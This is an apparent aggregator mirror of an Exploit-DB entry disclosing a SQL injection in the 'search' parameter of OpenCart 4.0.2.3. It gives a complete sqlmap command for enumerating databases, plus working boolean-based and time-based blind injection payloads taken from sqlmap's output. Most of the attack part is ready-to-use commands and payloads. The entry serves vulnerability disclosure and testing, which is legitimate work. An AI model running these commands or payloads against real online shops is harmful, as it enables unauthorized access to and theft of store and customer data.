3

[webapps] OpenCart Core 4.0.2.3 - 'search' SQLi

 1 month ago
source link: https://www.exploit-db.com/exploits/51940
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

OpenCart Core 4.0.2.3 - 'search' SQLi

EDB-ID:

51940

EDB Verified:

Exploit:

  /  

Platform:

PHP

Date:

2024-04-02

Vulnerable App:

# Exploit Title: OpenCart Core 4.0.2.3 - 'search' SQLi
# Date: 2024-04-2
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.opencart.com/
# Software Link: https://github.com/opencart/opencart/releases
# Version: 4.0.2.3
# Tested on: XAMPP, Linux
# Contact: https://twitter.com/dmaral3noz
* Description :
Opencart allows SQL Injection via parameter 'search' in /index.php?route=product/search&search=.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
* Steps to Reproduce :
- Go to : http://127.0.0.1/index.php?route=product/search&search=test
- New Use command Sqlmap : sqlmap -u "http://127.0.0.1/index.php?route=product/search&search=#1" --level=5 --risk=3 -p search --dbs
===========
Output :
Parameter: search (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: route=product/search&search=') AND 2427=2427-- drCa
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: route=product/search&search=') AND (SELECT 8368 FROM (SELECT(SLEEP(5)))uUDJ)-- Nabb

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK